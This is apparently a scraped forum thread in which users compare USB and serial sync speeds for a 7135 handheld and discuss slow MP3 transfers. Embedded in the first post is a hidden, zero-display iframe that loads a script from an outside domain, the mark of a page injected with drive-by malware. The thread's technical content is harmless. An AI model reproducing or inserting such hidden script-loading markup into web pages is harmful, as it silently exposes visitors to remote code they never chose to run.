+ Reply to Thread

is it possible to sync at USB speeds?

I am only getting serial speeds even with USB.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: is it possible to sync at USB speeds?

Originally posted by richard
    I am only getting serial speeds even with USB.
    Have you actually compared using the serial cable v.s. the USB connection? Mine syncs about 4 times faster with the USB connection. MP3 transfers to the SD card are painfully slow, so I use my Cruzer for that, but regular palm synching is very fast.

Alan

I have never really benchmarked USB speeds, all I know is they are considerably faster than serial.

When I first received my 7135, it was early in the life of it and I did not receive a cradle. Once I received the cradle, I switched from using a serial data cable for sync'ing, and used the serial on the cradle. No difference. Once I installed the 7135 Palm desktop, which installs the USB drivers, I was able to use USB and it was like night and day. MP3 transfers alone proved to me the speed difference taking about 1/5 the time.

I don't know how to benchmark but it doesn't seem faster with USB than serial.